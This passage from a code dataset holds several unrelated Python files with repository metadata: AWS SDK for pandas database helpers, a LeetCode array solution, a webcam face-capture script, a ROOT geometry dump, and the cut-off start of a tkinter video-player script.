client_s3.exceptions.NoSuchKey:\n raise exceptions.NoFilesFound( # pylint: disable=raise-missing-from\n f\"No CA certificate found at {ssl_cert_path}.\"\n )\n ssl_context = ssl.create_default_context(cadata=ssl_cadata)\n\n if \"SECRET_ID\" in details:\n secret_value: Dict[str, Any] = secretsmanager.get_secret_json(\n name=details[\"SECRET_ID\"], boto3_session=boto3_session\n )\n username = secret_value[\"username\"]\n password = secret_value[\"password\"]\n else:\n username = details[\"USERNAME\"]\n password = details[\"PASSWORD\"]\n\n return ConnectionAttributes(\n kind=details[\"JDBC_CONNECTION_URL\"].split(\":\")[1].lower(),\n user=username,\n password=password,\n host=details[\"JDBC_CONNECTION_URL\"].split(\":\")[-2].replace(\"/\", \"\").replace(\"@\", \"\"),\n port=int(port),\n database=dbname if dbname is not None else database,\n ssl_context=ssl_context,\n )\n\n\ndef _get_connection_attributes_from_secrets_manager(\n secret_id: str, dbname: Optional[str], boto3_session: Optional[boto3.Session]\n) -> ConnectionAttributes:\n secret_value: Dict[str, Any] = secretsmanager.get_secret_json(name=secret_id, boto3_session=boto3_session)\n kind: str = secret_value[\"engine\"]\n if dbname is not None:\n _dbname: str = dbname\n elif \"dbname\" in secret_value:\n _dbname = secret_value[\"dbname\"]\n else:\n if kind != \"redshift\":\n raise exceptions.InvalidConnection(f\"The secret {secret_id} MUST have a dbname property.\")\n _dbname = _get_dbname(cluster_id=secret_value[\"dbClusterIdentifier\"], boto3_session=boto3_session)\n return ConnectionAttributes(\n kind=kind,\n user=secret_value[\"username\"],\n password=secret_value[\"password\"],\n host=secret_value[\"host\"],\n port=int(secret_value[\"port\"]),\n database=_dbname,\n ssl_context=None,\n )\n\n\ndef get_connection_attributes(\n connection: Optional[str] = None,\n secret_id: Optional[str] = None,\n catalog_id: Optional[str] = None,\n dbname: Optional[str] = None,\n boto3_session: Optional[boto3.Session] = None,\n) -> ConnectionAttributes:\n \"\"\"Get Connection Attributes.\"\"\"\n if connection is None and secret_id is None:\n raise exceptions.InvalidArgumentCombination(\n \"Failed attempt to connect. 
You MUST pass a connection name (Glue Catalog) OR a secret_id as argument.\"\n )\n if connection is not None:\n return _get_connection_attributes_from_catalog(\n connection=connection, catalog_id=catalog_id, dbname=dbname, boto3_session=boto3_session\n )\n return _get_connection_attributes_from_secrets_manager(\n secret_id=cast(str, secret_id), dbname=dbname, boto3_session=boto3_session\n )\n\n\ndef _convert_params(sql: str, params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]]) -> List[Any]:\n args: List[Any] = [sql]\n if params is not None:\n if hasattr(params, \"keys\"):\n return args + [params]\n return args + [list(params)]\n return args\n\n\ndef _should_handle_oracle_objects(dtype: pa.DataType) -> bool:\n return (\n dtype == pa.string()\n or dtype == pa.large_string()\n or isinstance(dtype, pa.Decimal128Type)\n or dtype == pa.binary()\n or dtype == pa.large_binary()\n )\n\n\ndef _records2df(\n records: List[Tuple[Any]],\n cols_names: List[str],\n index: Optional[Union[str, List[str]]],\n safe: bool,\n dtype: Optional[Dict[str, pa.DataType]],\n timestamp_as_object: bool,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"],\n) -> pd.DataFrame:\n arrays: List[pa.Array] = []\n for col_values, col_name in zip(tuple(zip(*records)), cols_names): # Transposing\n if (dtype is None) or (col_name not in dtype):\n if _oracledb_found:\n col_values = oracle.handle_oracle_objects(col_values, col_name) # ruff: noqa: PLW2901\n try:\n array: pa.Array = pa.array(obj=col_values, safe=safe) # Creating Arrow array\n except pa.ArrowInvalid as ex:\n array = _data_types.process_not_inferred_array(ex, values=col_values) # Creating Arrow array\n else:\n try:\n if _oracledb_found:\n if _should_handle_oracle_objects(dtype[col_name]):\n col_values = oracle.handle_oracle_objects(col_values, col_name, dtype)\n array = pa.array(obj=col_values, type=dtype[col_name], safe=safe) # Creating Arrow array with dtype\n except (pa.ArrowInvalid, pa.ArrowTypeError):\n array = pa.array(obj=col_values, safe=safe) # Creating Arrow array\n array = array.cast(target_type=dtype[col_name], safe=safe) # Casting\n arrays.append(array)\n if not arrays:\n df = pd.DataFrame(columns=cols_names)\n else:\n table = pa.Table.from_arrays(arrays=arrays, names=cols_names) # Creating arrow Table\n df = table.to_pandas( # Creating Pandas DataFrame\n use_threads=True,\n split_blocks=True,\n self_destruct=True,\n integer_object_nulls=False,\n date_as_object=True,\n types_mapper=_data_types.get_pyarrow2pandas_type_mapper(dtype_backend=dtype_backend),\n safe=safe,\n timestamp_as_object=timestamp_as_object,\n )\n if index is not None:\n df.set_index(index, inplace=True)\n return df\n\n\ndef _get_cols_names(cursor_description: Any) -> List[str]:\n cols_names = [col[0].decode(\"utf-8\") if isinstance(col[0], bytes) else col[0] for col in cursor_description]\n _logger.debug(\"cols_names: %s\", cols_names)\n\n return cols_names\n\n\ndef _iterate_results(\n con: Any,\n cursor_args: List[Any],\n chunksize: int,\n index_col: Optional[Union[str, List[str]]],\n safe: bool,\n dtype: Optional[Dict[str, pa.DataType]],\n timestamp_as_object: bool,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"],\n) -> Iterator[pd.DataFrame]:\n with con.cursor() as cursor:\n cursor.execute(*cursor_args)\n if _oracledb_found:\n decimal_dtypes = oracle.detect_oracle_decimal_datatype(cursor)\n _logger.debug(\"steporig: %s\", dtype)\n if decimal_dtypes and dtype is not None:\n dtype = dict(list(decimal_dtypes.items()) + list(dtype.items()))\n elif 
decimal_dtypes:\n dtype = decimal_dtypes\n\n cols_names = _get_cols_names(cursor.description)\n while True:\n records = cursor.fetchmany(chunksize)\n if not records:\n break\n yield _records2df(\n records=records,\n cols_names=cols_names,\n index=index_col,\n safe=safe,\n dtype=dtype,\n timestamp_as_object=timestamp_as_object,\n dtype_backend=dtype_backend,\n )\n\n\ndef _fetch_all_results(\n con: Any,\n cursor_args: List[Any],\n index_col: Optional[Union[str, List[str]]] = None,\n dtype: Optional[Dict[str, pa.DataType]] = None,\n safe: bool = True,\n timestamp_as_object: bool = False,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"] = \"pyarrow\",\n) -> pd.DataFrame:\n with con.cursor() as cursor:\n cursor.execute(*cursor_args)\n cols_names = _get_cols_names(cursor.description)\n if _oracledb_found:\n decimal_dtypes = oracle.detect_oracle_decimal_datatype(cursor)\n _logger.debug(\"steporig: %s\", dtype)\n if decimal_dtypes and dtype is not None:\n dtype = dict(list(decimal_dtypes.items()) + list(dtype.items()))\n elif decimal_dtypes:\n dtype = decimal_dtypes\n\n return _records2df(\n records=cast(List[Tuple[Any]], cursor.fetchall()),\n cols_names=cols_names,\n index=index_col,\n dtype=dtype,\n safe=safe,\n timestamp_as_object=timestamp_as_object,\n dtype_backend=dtype_backend,\n )\n\n\n@overload\ndef read_sql_query(\n sql: str,\n con: Any,\n index_col: Optional[Union[str, List[str]]] = ...,\n params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = ...,\n chunksize: None = ...,\n dtype: Optional[Dict[str, pa.DataType]] = ...,\n safe: bool = ...,\n timestamp_as_object: bool = ...,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"] = ...,\n) -> pd.DataFrame:\n ...\n\n\n@overload\ndef read_sql_query(\n sql: str,\n con: Any,\n *,\n index_col: Optional[Union[str, List[str]]] = ...,\n params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = ...,\n chunksize: int,\n dtype: Optional[Dict[str, pa.DataType]] = ...,\n safe: bool = ...,\n timestamp_as_object: bool = ...,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"] = ...,\n) -> Iterator[pd.DataFrame]:\n ...\n\n\n@overload\ndef read_sql_query(\n sql: str,\n con: Any,\n *,\n index_col: Optional[Union[str, List[str]]] = ...,\n params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = ...,\n chunksize: Optional[int],\n dtype: Optional[Dict[str, pa.DataType]] = ...,\n safe: bool = ...,\n timestamp_as_object: bool = ...,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"] = ...,\n) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]:\n ...\n\n\ndef read_sql_query(\n sql: str,\n con: Any,\n index_col: Optional[Union[str, List[str]]] = None,\n params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = None,\n chunksize: Optional[int] = None,\n dtype: Optional[Dict[str, pa.DataType]] = None,\n safe: bool = True,\n timestamp_as_object: bool = False,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"] = \"numpy_nullable\",\n) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]:\n \"\"\"Read SQL Query (generic).\"\"\"\n args = _convert_params(sql, params)\n try:\n if chunksize is None:\n return _fetch_all_results(\n con=con,\n cursor_args=args,\n index_col=index_col,\n dtype=dtype,\n safe=safe,\n timestamp_as_object=timestamp_as_object,\n dtype_backend=dtype_backend,\n )\n\n return _iterate_results(\n con=con,\n cursor_args=args,\n chunksize=chunksize,\n index_col=index_col,\n dtype=dtype,\n safe=safe,\n timestamp_as_object=timestamp_as_object,\n dtype_backend=dtype_backend,\n )\n 
except Exception as ex:\n        con.rollback()\n        _logger.error(ex)\n        raise\n\n\ndef generate_placeholder_parameter_pairs(\n    df: pd.DataFrame, column_placeholders: str, chunksize: int\n) -> Generator[Tuple[str, List[Any]], None, None]:\n    \"\"\"Extract Placeholder and Parameter pairs.\"\"\"\n\n    def convert_value_to_native_python_type(value: Any) -> Any:\n        if pd.isna(value):\n            return None\n        if hasattr(value, \"to_pydatetime\"):\n            return value.to_pydatetime()\n\n        return value\n\n    parameters = df.values.tolist()\n    for i in range(0, len(df.index), chunksize):\n        parameters_chunk = parameters[i : i + chunksize]\n        chunk_placeholders = \", \".join([f\"({column_placeholders})\" for _ in range(len(parameters_chunk))])\n        flattened_chunk = [convert_value_to_native_python_type(value) for row in parameters_chunk for value in row]\n        yield chunk_placeholders, flattened_chunk\n\n\ndef validate_mode(mode: str, allowed_modes: List[str]) -> None:\n    \"\"\"Check if mode is included in allowed_modes.\"\"\"\n    if mode not in allowed_modes:\n        raise exceptions.InvalidArgumentValue(f\"mode must be one of {', '.join(allowed_modes)}\")\n","repo_name":"aws/aws-sdk-pandas","sub_path":"awswrangler/_databases.py","file_name":"_databases.py","file_ext":"py","file_size_in_byte":13918,"program_lang":"python","lang":"en","doc_type":"code","stars":3653,"dataset":"github-code","pt":"32"}
+{"seq_id":"33929479101","text":"class Solution:\n    def productExceptSelf(self, nums: List[int]) -> List[int]:\n        # Would be really easy if you could use the division operator\n        # Use a prefix postfix approach, e.g. nums=[1,2,3,4] -> res=[24,12,8,6]\n        res = [1] * len(nums)\n        product = 1\n        # Getting prefix array using nums\n        for i in range(len(nums)):\n            res[i] *= product\n            product *= nums[i]\n        product = 1\n        # Second pass applying postfix\n        for i in range(len(nums)-1, -1, -1):\n            res[i] *= product\n            product *= nums[i]\n        return res\n        \n        \n        \n        ","repo_name":"Danryanh7/Leetcode","sub_path":"0238-product-of-array-except-self/0238-product-of-array-except-self.py","file_name":"0238-product-of-array-except-self.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38897761152","text":"# This file captures faces of the user\n\nimport cv2 as cv\n\n\ndef detectAndDisplay(img):\n    # img = cv.equalizeHist(img)\n    faces = face_cascade.detectMultiScale(img)\n    for (x, y, w, h) in faces:\n        # center = (x + w // 2, y + h // 2)\n        # img = cv.ellipse(img, center, (w // 2, h // 2), 0, 0, 360, (255, 0, 255), 4)\n        img = cv.rectangle(img, (x, y), (x + w, y + h), 255, 4)\n    cv.imshow('Face detection', img)\n    return faces\n\n\ndef crop(img, p1, p2):\n    # numpy images index rows (y) first, then columns (x)\n    return img[p1[1]:p2[1], p1[0]:p2[0]]\n\n\nface_cascade = cv.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nif __name__ == \"__main__\":\n    cap = cv.VideoCapture(0)\n    if not cap.isOpened():\n        print(\"Unable to open camera.\")\n        exit()\n    print(\"Successfully opened camera!\")\n\n    count = 0\n    while True:\n        ret, frame = cap.read()\n        if not ret:\n            print(\"Cannot receive frame. 
Exiting...\")\n\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n faces = detectAndDisplay(gray)\n\n key = cv.waitKey(1)\n if key == ord('q'):\n print('Quit')\n break\n if key == ord('s'):\n print('Save')\n x, y, w, h = faces[0]\n p1 = (x, y)\n p2 = (x + w, y + h)\n img = crop(gray, p1, p2)\n cv.imwrite(\"img%d.png\" % count, img)\n count += 1\n cap.release()\n cv.destroyAllWindows()\n","repo_name":"Bugart-Lan/Face_Recognition","sub_path":"detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17264856381","text":"from ROOT import TChain\nimport sys\nch=TChain(\"geotree\")\nch.AddFile(sys.argv[1])\nch.GetEntry(0)\n\npmtX,pmtY,pmtZ = ch.pmtX, ch.pmtY, ch.pmtZ\nminX,minY,minZ = ch.minX, ch.minY, ch.minZ\nmaxX,maxY,maxZ = ch.maxX, ch.maxY, ch.maxZ\n\ntpcid=0\n\nprint('DetectorSpecs: {')\nprint(' MaxPosition: [%f,%f,%f]' % (maxX[tpcid],maxY[tpcid],maxZ[tpcid]))\nprint(' MinPosition: [%f,%f,%f]' % (minX[tpcid],minY[tpcid],minZ[tpcid]))\nfor pmt in range(pmtX.size()):\n print(' PMT%d: [%f,%f,%f]' % (pmt, pmtX[pmt], pmtY[pmt], pmtZ[pmt]))\nprint('}')\n","repo_name":"drinkingkazu/OpT0Finder","sub_path":"bin/dump_geotree.py","file_name":"dump_geotree.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"33888419024","text":"__author__ = 'PythonStriker'\n\nimport requests\nimport webbrowser\nimport re\nimport tkinter as tk\nfrom tkinter import ttk\nimport os\n\ndata = [\"播放接口1\",\"播放接口2\",\\\n \"播放接口3\",\"播放接口4\",\\\n \"播放接口5\"]\n\nurl = 'http://www.qmaile.com/'\n\ndef read():\n if os.path.exists('data.txt'):\n with open('data.txt', encoding='utf-8', mode='r') as file:\n if os.path.getsize('data.txt')==0:\n readlist = ['', '']\n else:\n lines = file.readlines()\n last_line = lines[-1]\n readlist = last_line.split(' ')\n else:\n file = open('data.txt',encoding='utf-8',mode='a')\n file.close()\n readlist = ['', '']\n return readlist\n\nresponed = requests.get(url)\nreg = re.compile('